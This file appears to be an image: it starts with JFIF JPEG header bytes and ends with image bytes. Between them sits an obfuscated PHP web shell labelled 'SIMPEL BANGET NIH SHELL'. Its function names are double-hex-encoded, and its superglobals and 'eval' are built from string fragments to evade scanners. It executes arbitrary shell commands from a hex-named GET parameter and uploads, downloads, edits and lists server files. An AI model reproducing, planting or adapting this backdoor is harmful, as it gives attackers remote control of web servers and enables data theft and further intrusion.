��JFIF�����x�x���C������������������������������������ � ��
���
������ ��
�������C��������������������������������������������������������������������������"�����������������������������������
������������������}��������!1A��Qa�"q�2�#B�R$3br
�����%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz����������������������������
������������������w�������!1��AQ�aq�"2��B #3R�br
*
* GOOD LUCK, HAVE FUN!
*/
session_start();
error_reporting(E_ALL);
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = [
'36643662',
'363436393732',
'36373635373435663636363936633635356637303635373236643639373337333639366636653733',
'3639373335663737373236393734363136323663363535663730363537323664363937333733363936663665',
'36353738363536333735373436353433366636643664363136653634',
'373037323666363335663666373036353665',
'3733373437323635363136643566363736353734356636333666366537343635366537343733',
'36363639366336353566363736353734356636333666366537343635366537343733',
'36363639366336353566373037353734356636333666366537343635366537343733',
'3632363936653332363836353738',
'366436663736363535663735373036633666363136343635363435663636363936633635',
'3638373436643663373337303635363336393631366336333638363137323733',
'3638363537383332363236393665',
'373036383730356637353665363136643635',
'3733363336313665363436393732',
'363937333566363436393732',
'36363639366336353566363537383639373337343733',
'37323635363136343636363936633635',
'36363639366336353733363937613635',
'36393733356637373732363937343631363236633635',
'373236353665363136643635',
'363636393663363537303635373236643733',
'3733373037323639366537343636',
'373337353632373337343732',
'363636333663366637333635',
'373037323666363335663666373036353665',
'36393733356637323635373336663735373236333635',
'3730373236663633356636333663366637333635',
'373536653663363936653662',
'3639373335663636363936633635',
'34353534', //30
'353634353532',
'3533343934663465',
'346334353533',
'35333534',
'3633366636643664363136653634',
'3737366637323662363936653637343436393732363536333734366637323739',
'363337323635363137343635343436393732363536333734366637323739',
'37303639373036353733',
'36363639366336353733',
'3636363936633635',
'36363639366336353534366634343666373736653663366636313634',
];
$SETSUNA = [];
foreach ($Array as $hexString) {
$SETSUNA[] = hex2bin(hex2bin($hexString));
}
$satu = '_G';
$dua = $SETSUNA[30];
$tiga = '_SER';
$empat = $SETSUNA[31];
$lima = '_SES';
$enam = $SETSUNA[32];
$tujuh = '_FI';
$delapan = $SETSUNA[33];
$sembilan = '_PO';
$sepuluh = $SETSUNA[34];
$sebelas = 'ev';
$duabelas = 'al';
$tigabelas = 'iss';
$empatbelas = 'et';
// Gunakan $SETSUNA sesuai kebutuhan
$a = $SETSUNA[0];
$b = $SETSUNA[1];
$c = $a . $b;
$EVA = $sebelas . $duabelas;
global $EVA;
$L = $GLOBALS[$satu . $dua];
$M = $GLOBALS[$tiga . $empat];
$N = $GLOBALS[$lima . $enam];
$e = $GLOBALS[$tujuh . $delapan];
$o = $GLOBALS[$sembilan . $sepuluh];
$f = $SETSUNA[2];
$g = $SETSUNA[3];
$h = $SETSUNA[4];
$i = $SETSUNA[5];
$j = $SETSUNA[6];
$q = $SETSUNA[7];
$s = $SETSUNA[8];
$v = $SETSUNA[9];
$w = $SETSUNA[10];
$y = $SETSUNA[11];
$z = $SETSUNA[12];
$NM = $SETSUNA[13];
$SCN = $SETSUNA[14];
$ID = $SETSUNA[15];
$FE = $SETSUNA[16];
$RF = $SETSUNA[17];
$FS = $SETSUNA[18];
$IW = $SETSUNA[19];
$RNM = $SETSUNA[20];
$FP = $SETSUNA[21];
$SPRF = $SETSUNA[22];
$SBSR = $SETSUNA[23];
$FCL = $SETSUNA[24];
$PROP = $SETSUNA[25];
$IR = $SETSUNA[26];
$PRCL = $SETSUNA[27];
$UNL = $SETSUNA[28];
$ISF = $SETSUNA[29];
$FTD = $SETSUNA[41];
$ISS = $tigabelas . $empatbelas;
$ISS = function ($array, $elementName) {
return array_key_exists($elementName, $array);
};
$b = $ISS($L, $b) ? $z($L[$b]) : '.';
$files = $SCN($b);
$upload_message = '';
$edit_message = '';
$delete_message = '';
$create_dir_message = '';
// Function to create a new directory
function createDirectory($b, $newDirectoryName)
{
$newDirPath = $b . '/' . $newDirectoryName;
global $ID;
if (!$ID($newDirPath)) {
global $c;
if ($c($newDirPath, 0755, true)) {
return "Directory '$newDirectoryName' created successfully.";
} else {
return "Failed to create directory. Check directory permissions or other errors.";
}
} else {
return "Directory '$newDirectoryName' already available.";
}
}
// Function to Download
global $FS, $FTD;
if ($ISS($L, 'download')) {
$FTD = $z($L['download']);
// Make sure that the requested file exists
if ($FE($FTD)) {
// Set header to trigger download
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($FTD) . '"');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . $FS($FTD));
$RF($FTD);
exit;
} else {
// Handle jika file tidak ditemukan
echo "File not found.";
}
}
// Function to get file permissions
function f($file): string {
global $FP, $SPRF, $SBSR;
return $SBSR($SPRF('%o', $FP($file)), -4);
}
// Function to check write permissions
function g($file): bool {
global $IW;
return $IW($file);
}
// Function to execute a command
function h($command, $workingDirectory = null)
{
global $j, $FCL, $PROP, $IR, $PRCL;
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = $PROP($command, $descriptorspec, $pipes, $workingDirectory);
if ($IR($process)) {
// Read output from stdout and stderr
$output_stdout = $j($pipes[1]); // Ganti dengan $SETSUNA[6] jika diperlukan
$output_stderr = $j($pipes[2]); // Ganti dengan $SETSUNA[6] jika diperlukan
$FCL($pipes[0]);
$FCL($pipes[1]);
$FCL($pipes[2]);
$return_value = $PRCL($process);
return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr;
} else {
return "Failed to execute command.";
}
}
if ($ISS($L, '636d64')) {
$command = $z($L['636d64']);
$result = h($command, $b);
}
if ($ISS($e, 'file_upload')) {
$tempFile = $e['file_upload']['tmp_name'];
$targetFile = $b . '/' . $e['file_upload']['name'];
if ($w($tempFile, $targetFile)) {
$upload_message = 'File uploaded successfully.';
} else {
$upload_message = 'Failed to upload file.';
}
}
//function for edit file
if ($ISS($o, 'edit_file')) {
$file = $o['edit_file'];
$content = $q($file);
if ($content !== false) {
?>
Edit File
' . z($message) . '';
}
$un = $NM();
$current_dir = realpath($b);
?>
SIMPEL BANGET NIH SHELL
Current directory:
Server information:
| Filename |
Permissions |
Actions |
|
|
|
|
Command Execution Bypass
�$4%����&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz����������?��Nm?��j�E�P�